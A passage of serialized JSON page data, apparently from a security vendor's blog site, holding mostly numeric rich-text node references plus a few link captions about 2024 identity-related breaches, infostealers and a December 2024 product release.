],{},{"nodeType":173,"value":156333,"marks":166002,"data":166004},[166003],{"type":370},{},{"nodeType":173,"value":156624,"marks":166006,"data":166007},[],{},{"nodeType":178,"data":166009,"content":166010},{},[166011,166015,166018,166022],{"nodeType":173,"value":156631,"marks":166012,"data":166014},[166013],{"type":370},{},{"nodeType":173,"value":156636,"marks":166016,"data":166017},[],{},{"nodeType":173,"value":156640,"marks":166019,"data":166021},[166020],{"type":370},{},{"nodeType":173,"value":156645,"marks":166023,"data":166024},[],{},{"nodeType":312,"data":166026,"content":166029},{"target":166027},{"sys":166028},{"id":156652,"type":317,"linkType":318},[],{"nodeType":178,"data":166031,"content":166032},{},[166033],{"nodeType":173,"value":156658,"marks":166034,"data":166035},[],{},{"nodeType":178,"data":166037,"content":166038},{},[166039],{"nodeType":173,"value":156665,"marks":166040,"data":166041},[],{},{"nodeType":235,"data":166043,"content":166044},{},[166045],{"nodeType":173,"value":156672,"marks":166046,"data":166047},[],{},{"nodeType":178,"data":166049,"content":166050},{},[166051,166054,166058],{"nodeType":173,"value":156679,"marks":166052,"data":166053},[],{},{"nodeType":173,"value":156683,"marks":166055,"data":166057},[166056],{"type":370},{},{"nodeType":173,"value":156688,"marks":166059,"data":166060},[],{},{"nodeType":312,"data":166062,"content":166065},{"target":166063},{"sys":166064},{"id":156695,"type":317,"linkType":318},[],{"nodeType":178,"data":166067,"content":166068},{},[166069,166072,166076,166079,166083,166086,166094],{"nodeType":173,"value":156701,"marks":166070,"data":166071},[],{},{"nodeType":173,"value":71581,"marks":166073,"data":166075},[166074],{"type":370},{},{"nodeType":173,"value":156709,"marks":166077,"data":166078},[],{},{"nodeType":173,"value":156713,"marks":166080,"data":166082},[166081],{"type":370},{},{"nodeType":173,"value":156718,"marks":166084,"data":166085},[],{},{"nodeType":1698,"data":166087,"content":166090},{"target":166088},{"sys":166089},{"id":156725,"type":317,"linkType":318},[166091],{"nodeType":173,"value":835,"marks":166092,"data":166093},[],{},{"nodeType":173,"value":1477,"marks":166095,"data":166096},[],{},{"nodeType":312,"data":166098,"content":166101},{"target":166099},{"sys":166100},{"id":156737,"type":317,"linkType":318},[],{"nodeType":235,"data":166103,"content":166104},{},[166105],{"nodeType":173,"value":156743,"marks":166106,"data":166107},[],{},{"nodeType":178,"data":166109,"content":166110},{},[166111,166114,166118,166121,166125,166128,166132],{"nodeType":173,"value":2566,"marks":166112,"data":166113},[],{},{"nodeType":173,"value":71552,"marks":166115,"data":166117},[166116],{"type":370},{},{"nodeType":173,"value":2936,"marks":166119,"data":166120},[],{},{"nodeType":173,"value":83669,"marks":166122,"data":166124},[166123],{"type":370},{},{"nodeType":173,"value":9534,"marks":166126,"data":166127},[],{},{"nodeType":173,"value":71581,"marks":166129,"data":166131},[166130],{"type":370},{},{"nodeType":173,"value":156771,"marks":166133,"data":166134},[],{},{"nodeType":178,"data":166136,"content":166137},{},[166138,166142],{"nodeType":173,"value":156778,"marks":166139,"data":166141},[166140],{"type":370},{},{"nodeType":173,"value":156783,"marks":166143,"data":166144},[],{},{"nodeType":235,"data":166146,"content":166147},{},[166148],{"nodeType":173,"value":156790,"marks":166149,"data":166150},[],{},{"nodeType":178,"data":166152,"content":166153},{},[166154],{"nodeType":173,"value":156797,"marks":166155,"data":166156},[],{},{"nodeType":178,"data":166158,"content":166159},{},[166160],{"nodeType":173,"value":156804,"marks":166161,"data":166162},[],{},{"nodeType":250,"data":166164,"content":166165},{},[166166,166189,166198],{"nodeType":254,"data":166167,"content":166168},{},[166169],{"nodeType":178,"data":166170,"content":166171},{},[166172,166175,166179,166182,166186],{"nodeType":173,"value":156817,"marks":166173,"data":166174},[],{},{"nodeType":173,"value":156821,"marks":166176,"data":166178},[166177],{"type":370},{},{"nodeType":173,"value":933,"marks":166180,"data":166181},[],{},{"nodeType":173,"value":156829,"marks":166183,"data":166185},[166184],{"type":370},{},{"nodeType":173,"value":156834,"marks":166187,"data":166188},[],{},{"nodeType":254,"data":166190,"content":166191},{},[166192],{"nodeType":178,"data":166193,"content":166194},{},[166195],{"nodeType":173,"value":156844,"marks":166196,"data":166197},[],{},{"nodeType":254,"data":166199,"content":166200},{},[166201],{"nodeType":178,"data":166202,"content":166203},{},[166204],{"nodeType":173,"value":156854,"marks":166205,"data":166206},[],{},{"nodeType":178,"data":166208,"content":166209},{},[166210],{"nodeType":173,"value":156861,"marks":166211,"data":166212},[],{},{"nodeType":312,"data":166214,"content":166217},{"target":166215},{"sys":166216},{"id":156868,"type":317,"linkType":318},[],{"nodeType":178,"data":166219,"content":166220},{},[166221],{"nodeType":173,"value":156874,"marks":166222,"data":166223},[],{},{"nodeType":231,"data":166225,"content":166226},{},[],{"nodeType":169,"data":166228,"content":166229},{},[166230],{"nodeType":173,"value":156884,"marks":166231,"data":166232},[],{},{"nodeType":178,"data":166234,"content":166235},{},[166236],{"nodeType":173,"value":156891,"marks":166237,"data":166238},[],{},{"nodeType":178,"data":166240,"content":166241},{},[166242],{"nodeType":173,"value":156898,"marks":166243,"data":166244},[],{},{"nodeType":235,"data":166246,"content":166247},{},[166248],{"nodeType":173,"value":156905,"marks":166249,"data":166250},[],{},{"nodeType":178,"data":166252,"content":166253},{},[166254,166257,166261,166264,166268,166271,166275,166278,166282,166285,166289,166292,166296],{"nodeType":173,"value":156912,"marks":166255,"data":166256},[],{},{"nodeType":173,"value":125683,"marks":166258,"data":166260},[166259],{"type":370},{},{"nodeType":173,"value":156920,"marks":166262,"data":166263},[],{},{"nodeType":173,"value":2740,"marks":166265,"data":166267},[166266],{"type":370},{},{"nodeType":173,"value":1464,"marks":166269,"data":166270},[],{},{"nodeType":173,"value":2748,"marks":166272,"data":166274},[166273],{"type":370},{},{"nodeType":173,"value":156935,"marks":166276,"data":166277},[],{},{"nodeType":173,"value":24345,"marks":166279,"data":166281},[166280],{"type":370},{},{"nodeType":173,"value":156943,"marks":166283,"data":166284},[],{},{"nodeType":173,"value":2740,"marks":166286,"data":166288},[166287],{"type":370},{},{"nodeType":173,"value":1464,"marks":166290,"data":166291},[],{},{"nodeType":173,"value":2748,"marks":166293,"data":166295},[166294],{"type":370},{},{"nodeType":173,"value":156958,"marks":166297,"data":166298},[],{},{"nodeType":178,"data":166300,"content":166301},{},[166302,166305,166309],{"nodeType":173,"value":2785,"marks":166303,"data":166304},[],{},{"nodeType":173,"value":18649,"marks":166306,"data":166308},[166307],{"type":370},{},{"nodeType":173,"value":156972,"marks":166310,"data":166311},[],{},{"nodeType":250,"data":166313,"content":166314},{},[166315,166331,166340,166349],{"nodeType":254,"data":166316,"content":166317},{},[166318],{"nodeType":178,"data":166319,"content":166320},{},[166321,166324,166328],{"nodeType":173,"value":156985,"marks":166322,"data":166323},[],{},{"nodeType":173,"value":19371,"marks":166325,"data":166327},[166326],{"type":370},{},{"nodeType":173,"value":1477,"marks":166329,"data":166330},[],{},{"nodeType":254,"data":166332,"content":166333},{},[166334],{"nodeType":178,"data":166335,"content":166336},{},[166337],{"nodeType":173,"value":157002,"marks":166338,"data":166339},[],{},{"nodeType":254,"data":166341,"content":166342},{},[166343],{"nodeType":178,"data":166344,"content":166345},{},[166346],{"nodeType":173,"value":157012,"marks":166347,"data":166348},[],{},{"nodeType":254,"data":166350,"content":166351},{},[166352],{"nodeType":178,"data":166353,"content":166354},{},[166355],{"nodeType":173,"value":157022,"marks":166356,"data":166357},[],{},{"nodeType":178,"data":166359,"content":166360},{},[166361,166364,166368,166371,166375,166378,166382],{"nodeType":173,"value":157029,"marks":166362,"data":166363},[],{},{"nodeType":173,"value":24345,"marks":166365,"data":166367},[166366],{"type":370},{},{"nodeType":173,"value":1464,"marks":166369,"data":166370},[],{},{"nodeType":173,"value":24353,"marks":166372,"data":166374},[166373],{"type":370},{},{"nodeType":173,"value":157044,"marks":166376,"data":166377},[],{},{"nodeType":173,"value":157048,"marks":166379,"data":166381},[166380],{"type":370},{},{"nodeType":173,"value":157053,"marks":166383,"data":166384},[],{},{"nodeType":235,"data":166386,"content":166387},{},[166388],{"nodeType":173,"value":157060,"marks":166389,"data":166390},[],{},{"nodeType":178,"data":166392,"content":166393},{},[166394,166397,166401,166404,166408,166411,166415,166418,166422,166425,166429,166432,166436,166439,166443],{"nodeType":173,"value":157067,"marks":166395,"data":166396},[],{},{"nodeType":173,"value":2631,"marks":166398,"data":166400},[166399],{"type":370},{},{"nodeType":173,"value":157075,"marks":166402,"data":166403},[],{},{"nodeType":173,"value":157079,"marks":166405,"data":166407},[166406],{"type":370},{},{"nodeType":173,"value":2936,"marks":166409,"data":166410},[],{},{"nodeType":173,"value":157087,"marks":166412,"data":166414},[166413],{"type":370},{},{"nodeType":173,"value":2936,"marks":166416,"data":166417},[],{},{"nodeType":173,"value":157095,"marks":166419,"data":166421},[166420],{"type":370},{},{"nodeType":173,"value":3949,"marks":166423,"data":166424},[],{},{"nodeType":173,"value":2748,"marks":166426,"data":166428},[166427],{"type":370},{},{"nodeType":173,"value":157107,"marks":166430,"data":166431},[],{},{"nodeType":173,"value":18649,"marks":166433,"data":166435},[166434],{"type":370},{},{"nodeType":173,"value":157115,"marks":166437,"data":166438},[],{},{"nodeType":173,"value":157119,"marks":166440,"data":166442},[166441],{"type":370},{},{"nodeType":173,"value":157124,"marks":166444,"data":166445},[],{},{"nodeType":312,"data":166447,"content":166450},{"target":166448},{"sys":166449},{"id":157131,"type":317,"linkType":318},[],{"nodeType":178,"data":166452,"content":166453},{},[166454],{"nodeType":173,"value":157137,"marks":166455,"data":166456},[],{},{"nodeType":250,"data":166458,"content":166459},{},[166460,166469,166478,166487,166496],{"nodeType":254,"data":166461,"content":166462},{},[166463],{"nodeType":178,"data":166464,"content":166465},{},[166466],{"nodeType":173,"value":157150,"marks":166467,"data":166468},[],{},{"nodeType":254,"data":166470,"content":166471},{},[166472],{"nodeType":178,"data":166473,"content":166474},{},[166475],{"nodeType":173,"value":157160,"marks":166476,"data":166477},[],{},{"nodeType":254,"data":166479,"content":166480},{},[166481],{"nodeType":178,"data":166482,"content":166483},{},[166484],{"nodeType":173,"value":157170,"marks":166485,"data":166486},[],{},{"nodeType":254,"data":166488,"content":166489},{},[166490],{"nodeType":178,"data":166491,"content":166492},{},[166493],{"nodeType":173,"value":157180,"marks":166494,"data":166495},[],{},{"nodeType":254,"data":166497,"content":166498},{},[166499],{"nodeType":178,"data":166500,"content":166501},{},[166502],{"nodeType":173,"value":157190,"marks":166503,"data":166504},[],{},{"nodeType":178,"data":166506,"content":166507},{},[166508,166512,166515,166519],{"nodeType":173,"value":156778,"marks":166509,"data":166511},[166510],{"type":370},{},{"nodeType":173,"value":157201,"marks":166513,"data":166514},[],{},{"nodeType":173,"value":2718,"marks":166516,"data":166518},[166517],{"type":370},{},{"nodeType":173,"value":157209,"marks":166520,"data":166521},[],{},{"nodeType":235,"data":166523,"content":166524},{},[166525],{"nodeType":173,"value":157216,"marks":166526,"data":166527},[],{},{"nodeType":178,"data":166529,"content":166530},{},[166531,166534,166538],{"nodeType":173,"value":157223,"marks":166532,"data":166533},[],{},{"nodeType":173,"value":2570,"marks":166535,"data":166537},[166536],{"type":370},{},{"nodeType":173,"value":157231,"marks":166539,"data":166540},[],{},{"nodeType":250,"data":166542,"content":166543},{},[166544,166567],{"nodeType":254,"data":166545,"content":166546},{},[166547],{"nodeType":178,"data":166548,"content":166549},{},[166550,166553,166557,166560,166564],{"nodeType":173,"value":2785,"marks":166551,"data":166552},[],{},{"nodeType":173,"value":18649,"marks":166554,"data":166556},[166555],{"type":370},{},{"nodeType":173,"value":157251,"marks":166558,"data":166559},[],{},{"nodeType":173,"value":2570,"marks":166561,"data":166563},[166562],{"type":370},{},{"nodeType":173,"value":157259,"marks":166565,"data":166566},[],{},{"nodeType":254,"data":166568,"content":166569},{},[166570],{"nodeType":178,"data":166571,"content":166572},{},[166573],{"nodeType":173,"value":157269,"marks":166574,"data":166575},[],{},{"nodeType":178,"data":166577,"content":166578},{},[166579],{"nodeType":173,"value":157276,"marks":166580,"data":166581},[],{},{"nodeType":235,"data":166583,"content":166584},{},[166585],{"nodeType":173,"value":157283,"marks":166586,"data":166587},[],{},{"nodeType":178,"data":166589,"content":166590},{},[166591],{"nodeType":173,"value":157290,"marks":166592,"data":166593},[],{},{"nodeType":178,"data":166595,"content":166596},{},[166597,166600,166604,166607,166613],{"nodeType":173,"value":157297,"marks":166598,"data":166599},[],{},{"nodeType":173,"value":2718,"marks":166601,"data":166603},[166602],{"type":370},{},{"nodeType":173,"value":157305,"marks":166605,"data":166606},[],{},{"nodeType":186,"data":166608,"content":166609},{"uri":2333},[166610],{"nodeType":173,"value":157312,"marks":166611,"data":166612},[],{},{"nodeType":173,"value":157316,"marks":166614,"data":166615},[],{},{"nodeType":312,"data":166617,"content":166620},{"target":166618},{"sys":166619},{"id":157323,"type":317,"linkType":318},[],{"nodeType":231,"data":166622,"content":166623},{},[],{"nodeType":169,"data":166625,"content":166626},{},[166627],{"nodeType":173,"value":157332,"marks":166628,"data":166629},[],{},{"nodeType":178,"data":166631,"content":166632},{},[166633],{"nodeType":173,"value":157339,"marks":166634,"data":166635},[],{},{"nodeType":178,"data":166637,"content":166638},{},[166639],{"nodeType":173,"value":157346,"marks":166640,"data":166641},[],{},{"nodeType":250,"data":166643,"content":166644},{},[166645,166658,166671,166684,166697,166713,166726],{"nodeType":254,"data":166646,"content":166647},{},[166648],{"nodeType":178,"data":166649,"content":166650},{},[166651,166655],{"nodeType":173,"value":157359,"marks":166652,"data":166654},[166653],{"type":370},{},{"nodeType":173,"value":157364,"marks":166656,"data":166657},[],{},{"nodeType":254,"data":166659,"content":166660},{},[166661],{"nodeType":178,"data":166662,"content":166663},{},[166664,166668],{"nodeType":173,"value":157374,"marks":166665,"data":166667},[166666],{"type":370},{},{"nodeType":173,"value":157379,"marks":166669,"data":166670},[],{},{"nodeType":254,"data":166672,"content":166673},{},[166674],{"nodeType":178,"data":166675,"content":166676},{},[166677,166681],{"nodeType":173,"value":157389,"marks":166678,"data":166680},[166679],{"type":370},{},{"nodeType":173,"value":157394,"marks":166682,"data":166683},[],{},{"nodeType":254,"data":166685,"content":166686},{},[166687],{"nodeType":178,"data":166688,"content":166689},{},[166690,166694],{"nodeType":173,"value":157404,"marks":166691,"data":166693},[166692],{"type":370},{},{"nodeType":173,"value":157409,"marks":166695,"data":166696},[],{},{"nodeType":254,"data":166698,"content":166699},{},[166700],{"nodeType":178,"data":166701,"content":166702},{},[166703,166706,166710],{"nodeType":173,"value":157419,"marks":166704,"data":166705},[],{},{"nodeType":173,"value":157423,"marks":166707,"data":166709},[166708],{"type":370},{},{"nodeType":173,"value":157428,"marks":166711,"data":166712},[],{},{"nodeType":254,"data":166714,"content":166715},{},[166716],{"nodeType":178,"data":166717,"content":166718},{},[166719,166723],{"nodeType":173,"value":157438,"marks":166720,"data":166722},[166721],{"type":370},{},{"nodeType":173,"value":157443,"marks":166724,"data":166725},[],{},{"nodeType":254,"data":166727,"content":166728},{},[166729],{"nodeType":178,"data":166730,"content":166731},{},[166732,166736],{"nodeType":173,"value":157453,"marks":166733,"data":166735},[166734],{"type":370},{},{"nodeType":173,"value":157458,"marks":166737,"data":166738},[],{},{"nodeType":178,"data":166740,"content":166741},{},[166742],{"nodeType":173,"value":157465,"marks":166743,"data":166744},[],{},{"nodeType":312,"data":166746,"content":166749},{"target":166747},{"sys":166748},{"id":157472,"type":317,"linkType":318},[],{"nodeType":178,"data":166751,"content":166752},{},[166753],{"nodeType":173,"value":37,"marks":166754,"data":166755},[],{},{"items":166757},[166758],{"sys":166759,"name":26137},{"id":26136},{"items":166761},[166762],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":166763},{"url":2911},{"url":166765},"https://images.ctfassets.net/y1cdw1ablpvd/6AYqSpjNFFdEHnjviy5R7y/c1566a4f95e3c4d547abddba22ea2fd2/2024_identity_attacks__1_.png",{"items":166767},[166768],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":166769},{"url":1496},{"json":166771,"links":167310},{"nodeType":165,"data":166772,"content":166773},{},[166774,166780,166786,166792,166808,166814,166820,166823,166830,166836,166842,166848,166853,166859,166862,166869,166875,166881,166887,166893,166898,166904,166907,166914,166921,166927,166933,166939,166955,166962,166968,166974,166980,166986,166993,166999,167005,167010,167013,167020,167026,167032,167038,167044,167050,167053,167060,167066,167072,167078,167084,167090,167188,167201,167207,167212,167215,167222,167228,167288,167294],{"nodeType":178,"data":166775,"content":166776},{},[166777],{"nodeType":173,"value":149989,"marks":166778,"data":166779},[],{},{"nodeType":178,"data":166781,"content":166782},{},[166783],{"nodeType":173,"value":149996,"marks":166784,"data":166785},[],{},{"nodeType":178,"data":166787,"content":166788},{},[166789],{"nodeType":173,"value":150003,"marks":166790,"data":166791},[],{},{"nodeType":178,"data":166793,"content":166794},{},[166795,166798,166805],{"nodeType":173,"value":150010,"marks":166796,"data":166797},[],{},{"nodeType":186,"data":166799,"content":166800},{"uri":150015},[166801],{"nodeType":173,"value":150018,"marks":166802,"data":166804},[166803],{"type":194},{},{"nodeType":173,"value":1477,"marks":166806,"data":166807},[],{},{"nodeType":178,"data":166809,"content":166810},{},[166811],{"nodeType":173,"value":150029,"marks":166812,"data":166813},[],{},{"nodeType":178,"data":166815,"content":166816},{},[166817],{"nodeType":173,"value":150036,"marks":166818,"data":166819},[],{},{"nodeType":231,"data":166821,"content":166822},{},[],{"nodeType":169,"data":166824,"content":166825},{},[166826],{"nodeType":173,"value":150046,"marks":166827,"data":166829},[166828],{"type":370},{},{"nodeType":178,"data":166831,"content":166832},{},[166833],{"nodeType":173,"value":150054,"marks":166834,"data":166835},[],{},{"nodeType":178,"data":166837,"content":166838},{},[166839],{"nodeType":173,"value":150061,"marks":166840,"data":166841},[],{},{"nodeType":178,"data":166843,"content":166844},{},[166845],{"nodeType":173,"value":150068,"marks":166846,"data":166847},[],{},{"nodeType":312,"data":166849,"content":166852},{"target":166850},{"sys":166851},{"id":150075,"type":317,"linkType":318},[],{"nodeType":178,"data":166854,"content":166855},{},[166856],{"nodeType":173,"value":150081,"marks":166857,"data":166858},[],{},{"nodeType":231,"data":166860,"content":166861},{},[],{"nodeType":169,"data":166863,"content":166864},{},[166865],{"nodeType":173,"value":150091,"marks":166866,"data":166868},[166867],{"type":370},{},{"nodeType":178,"data":166870,"content":166871},{},[166872],{"nodeType":173,"value":150099,"marks":166873,"data":166874},[],{},{"nodeType":178,"data":166876,"content":166877},{},[166878],{"nodeType":173,"value":150106,"marks":166879,"data":166880},[],{},{"nodeType":178,"data":166882,"content":166883},{},[166884],{"nodeType":173,"value":150113,"marks":166885,"data":166886},[],{},{"nodeType":178,"data":166888,"content":166889},{},[166890],{"nodeType":173,"value":150120,"marks":166891,"data":166892},[],{},{"nodeType":312,"data":166894,"content":166897},{"target":166895},{"sys":166896},{"id":150127,"type":317,"linkType":318},[],{"nodeType":178,"data":166899,"content":166900},{},[166901],{"nodeType":173,"value":150133,"marks":166902,"data":166903},[],{},{"nodeType":231,"data":166905,"content":166906},{},[],{"nodeType":169,"data":166908,"content":166909},{},[166910],{"nodeType":173,"value":150143,"marks":166911,"data":166913},[166912],{"type":370},{},{"nodeType":235,"data":166915,"content":166916},{},[166917],{"nodeType":173,"value":150151,"marks":166918,"data":166920},[166919],{"type":370},{},{"nodeType":178,"data":166922,"content":166923},{},[166924],{"nodeType":173,"value":150159,"marks":166925,"data":166926},[],{},{"nodeType":178,"data":166928,"content":166929},{},[166930],{"nodeType":173,"value":150166,"marks":166931,"data":166932},[],{},{"nodeType":178,"data":166934,"content":166935},{},[166936],{"nodeType":173,"value":150173,"marks":166937,"data":166938},[],{},{"nodeType":178,"data":166940,"content":166941},{},[166942,166945,166952],{"nodeType":173,"value":150180,"marks":166943,"data":166944},[],{},{"nodeType":186,"data":166946,"content":166947},{"uri":139925},[166948],{"nodeType":173,"value":150187,"marks":166949,"data":166951},[166950],{"type":194},{},{"nodeType":173,"value":150192,"marks":166953,"data":166954},[],{},{"nodeType":235,"data":166956,"content":166957},{},[166958],{"nodeType":173,"value":150199,"marks":166959,"data":166961},[166960],{"type":370},{},{"nodeType":178,"data":166963,"content":166964},{},[166965],{"nodeType":173,"value":150207,"marks":166966,"data":166967},[],{},{"nodeType":178,"data":166969,"content":166970},{},[166971],{"nodeType":173,"value":150214,"marks":166972,"data":166973},[],{},{"nodeType":178,"data":166975,"content":166976},{},[166977],{"nodeType":173,"value":150221,"marks":166978,"data":166979},[],{},{"nodeType":178,"data":166981,"content":166982},{},[166983],{"nodeType":173,"value":150228,"marks":166984,"data":166985},[],{},{"nodeType":235,"data":166987,"content":166988},{},[166989],{"nodeType":173,"value":150235,"marks":166990,"data":166992},[166991],{"type":370},{},{"nodeType":178,"data":166994,"content":166995},{},[166996],{"nodeType":173,"value":150243,"marks":166997,"data":166998},[],{},{"nodeType":178,"data":167000,"content":167001},{},[167002],{"nodeType":173,"value":150250,"marks":167003,"data":167004},[],{},{"nodeType":312,"data":167006,"content":167009},{"target":167007},{"sys":167008},{"id":150257,"type":317,"linkType":318},[],{"nodeType":231,"data":167011,"content":167012},{},[],{"nodeType":169,"data":167014,"content":167015},{},[167016],{"nodeType":173,"value":150266,"marks":167017,"data":167019},[167018],{"type":370},{},{"nodeType":178,"data":167021,"content":167022},{},[167023],{"nodeType":173,"value":150274,"marks":167024,"data":167025},[],{},{"nodeType":178,"data":167027,"content":167028},{},[167029],{"nodeType":173,"value":150281,"marks":167030,"data":167031},[],{},{"nodeType":178,"data":167033,"content":167034},{},[167035],{"nodeType":173,"value":150288,"marks":167036,"data":167037},[],{},{"nodeType":178,"data":167039,"content":167040},{},[167041],{"nodeType":173,"value":150295,"marks":167042,"data":167043},[],{},{"nodeType":178,"data":167045,"content":167046},{},[167047],{"nodeType":173,"value":150302,"marks":167048,"data":167049},[],{},{"nodeType":231,"data":167051,"content":167052},{},[],{"nodeType":169,"data":167054,"content":167055},{},[167056],{"nodeType":173,"value":150312,"marks":167057,"data":167059},[167058],{"type":370},{},{"nodeType":178,"data":167061,"content":167062},{},[167063],{"nodeType":173,"value":150320,"marks":167064,"data":167065},[],{},{"nodeType":178,"data":167067,"content":167068},{},[167069],{"nodeType":173,"value":150327,"marks":167070,"data":167071},[],{},{"nodeType":178,"data":167073,"content":167074},{},[167075],{"nodeType":173,"value":150334,"marks":167076,"data":167077},[],{},{"nodeType":178,"data":167079,"content":167080},{},[167081],{"nodeType":173,"value":150341,"marks":167082,"data":167083},[],{},{"nodeType":178,"data":167085,"content":167086},{},[167087],{"nodeType":173,"value":150348,"marks":167088,"data":167089},[],{},{"nodeType":250,"data":167091,"content":167092},{},[167093,167112,167131,167150,167169],{"nodeType":254,"data":167094,"content":167095},{},[167096],{"nodeType":178,"data":167097,"content":167098},{},[167099,167102,167109],{"nodeType":173,"value":150361,"marks":167100,"data":167101},[],{},{"nodeType":186,"data":167103,"content":167104},{"uri":125982},[167105],{"nodeType":173,"value":1300,"marks":167106,"data":167108},[167107],{"type":194},{},{"nodeType":173,"value":53584,"marks":167110,"data":167111},[],{},{"nodeType":254,"data":167113,"content":167114},{},[167115],{"nodeType":178,"data":167116,"content":167117},{},[167118,167121,167128],{"nodeType":173,"value":150381,"marks":167119,"data":167120},[],{},{"nodeType":186,"data":167122,"content":167123},{"uri":150386},[167124],{"nodeType":173,"value":150389,"marks":167125,"data":167127},[167126],{"type":194},{},{"nodeType":173,"value":53584,"marks":167129,"data":167130},[],{},{"nodeType":254,"data":167132,"content":167133},{},[167134],{"nodeType":178,"data":167135,"content":167136},{},[167137,167140,167147],{"nodeType":173,"value":150403,"marks":167138,"data":167139},[],{},{"nodeType":186,"data":167141,"content":167142},{"uri":150408},[167143],{"nodeType":173,"value":150411,"marks":167144,"data":167146},[167145],{"type":194},{},{"nodeType":173,"value":53584,"marks":167148,"data":167149},[],{},{"nodeType":254,"data":167151,"content":167152},{},[167153],{"nodeType":178,"data":167154,"content":167155},{},[167156,167159,167166],{"nodeType":173,"value":150425,"marks":167157,"data":167158},[],{},{"nodeType":186,"data":167160,"content":167161},{"uri":125812},[167162],{"nodeType":173,"value":1255,"marks":167163,"data":167165},[167164],{"type":194},{},{"nodeType":173,"value":53584,"marks":167167,"data":167168},[],{},{"nodeType":254,"data":167170,"content":167171},{},[167172],{"nodeType":178,"data":167173,"content":167174},{},[167175,167178,167185],{"nodeType":173,"value":150445,"marks":167176,"data":167177},[],{},{"nodeType":186,"data":167179,"content":167180},{"uri":150450},[167181],{"nodeType":173,"value":96495,"marks":167182,"data":167184},[167183],{"type":194},{},{"nodeType":173,"value":53584,"marks":167186,"data":167187},[],{},{"nodeType":178,"data":167189,"content":167190},{},[167191,167194,167198],{"nodeType":173,"value":150463,"marks":167192,"data":167193},[],{},{"nodeType":173,"value":150467,"marks":167195,"data":167197},[167196],{"type":370},{},{"nodeType":173,"value":150472,"marks":167199,"data":167200},[],{},{"nodeType":178,"data":167202,"content":167203},{},[167204],{"nodeType":173,"value":150479,"marks":167205,"data":167206},[],{},{"nodeType":312,"data":167208,"content":167211},{"target":167209},{"sys":167210},{"id":150486,"type":317,"linkType":318},[],{"nodeType":231,"data":167213,"content":167214},{},[],{"nodeType":169,"data":167216,"content":167217},{},[167218],{"nodeType":173,"value":150495,"marks":167219,"data":167221},[167220],{"type":370},{},{"nodeType":178,"data":167223,"content":167224},{},[167225],{"nodeType":173,"value":150503,"marks":167226,"data":167227},[],{},{"nodeType":250,"data":167229,"content":167230},{},[167231,167260,167279],{"nodeType":254,"data":167232,"content":167233},{},[167234],{"nodeType":178,"data":167235,"content":167236},{},[167237,167240,167247,167250,167257],{"nodeType":173,"value":37,"marks":167238,"data":167239},[],{},{"nodeType":186,"data":167241,"content":167242},{"uri":62639},[167243],{"nodeType":173,"value":150522,"marks":167244,"data":167246},[167245],{"type":194},{},{"nodeType":173,"value":150527,"marks":167248,"data":167249},[],{},{"nodeType":186,"data":167251,"content":167252},{"uri":125749},[167253],{"nodeType":173,"value":150534,"marks":167254,"data":167256},[167255],{"type":194},{},{"nodeType":173,"value":150539,"marks":167258,"data":167259},[],{},{"nodeType":254,"data":167261,"content":167262},{},[167263],{"nodeType":178,"data":167264,"content":167265},{},[167266,167269,167276],{"nodeType":173,"value":37,"marks":167267,"data":167268},[],{},{"nodeType":186,"data":167270,"content":167271},{"uri":4751},[167272],{"nodeType":173,"value":150555,"marks":167273,"data":167275},[167274],{"type":194},{},{"nodeType":173,"value":150560,"marks":167277,"data":167278},[],{},{"nodeType":254,"data":167280,"content":167281},{},[167282],{"nodeType":178,"data":167283,"content":167284},{},[167285],{"nodeType":173,"value":150570,"marks":167286,"data":167287},[],{},{"nodeType":178,"data":167289,"content":167290},{},[167291],{"nodeType":173,"value":150577,"marks":167292,"data":167293},[],{},{"nodeType":178,"data":167295,"content":167296},{},[167297,167300,167307],{"nodeType":173,"value":150584,"marks":167298,"data":167299},[],{},{"nodeType":186,"data":167301,"content":167302},{"uri":1469},[167303],{"nodeType":173,"value":71815,"marks":167304,"data":167306},[167305],{"type":194},{},{"nodeType":173,"value":1477,"marks":167308,"data":167309},[],{},{"entries":167311},{"hyperlink":167312,"inline":167313,"block":167314},[],[],[167315,167318,167324,167327],{"sys":167316,"__typename":15269,"type":15270,"ctaText":167317,"buttonLabel":134264,"buttonColour":15273,"buttonUrl":81621},{"id":150075},"Learn about how attack paths are changing with the shift to SaaS-based IT here",{"sys":167319,"__typename":5345,"title":167320,"caption":167321,"layoutMode":118,"file":167322},{"id":150127},"Identity-related breaches in 2024","Bold names are particularly notable for their significance and impact. A snowflake symbol indicates that the victim was impacted as part of the wider campaign against Snowflake customers. Dollar sign indicates that a ransom payment was confirmed.",{"url":166765,"width":121106,"height":167323},1150,{"sys":167325,"__typename":15269,"type":15270,"ctaText":167326,"buttonLabel":134264,"buttonColour":72847,"buttonUrl":819},{"id":150257},"Read more about the Snowflake incident in our blog post",{"sys":167328,"__typename":15269,"type":15270,"ctaText":167329,"buttonLabel":134264,"buttonColour":152046,"buttonUrl":126102},{"id":150486},"For more information on the rise of infostealers, check out our deep-dive here","content:blog:2024-identity-breaches.json","blog/2024-identity-breaches.json","blog/2024-identity-breaches",{"_path":167334,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":167335,"ogImage":118,"summary":167337,"title":148922,"subtitle":118,"metaTitle":167348,"synopsis":148923,"hashTags":118,"publishedDate":148924,"slug":148925,"tagsCollection":167349,"relatedBlogPostsCollection":167353,"authorsCollection":167661,"content":167665,"_id":168036,"_type":5439,"_source":5440,"_file":168037,"_stem":168038,"_extension":5439},"/blog/product-release-december-2024",{"id":148532,"publishedAt":167336},"2024-12-19T21:11:51.359Z",{"json":167338},{"data":167339,"content":167340,"nodeType":165},{},[167341],{"data":167342,"content":167343,"nodeType":178},{},[167344],{"data":167345,"marks":167346,"value":167347,"nodeType":173},{},[],"Detect verified stolen credentials, enforce MFA directly in the browser, and more","Push Security new product features for December 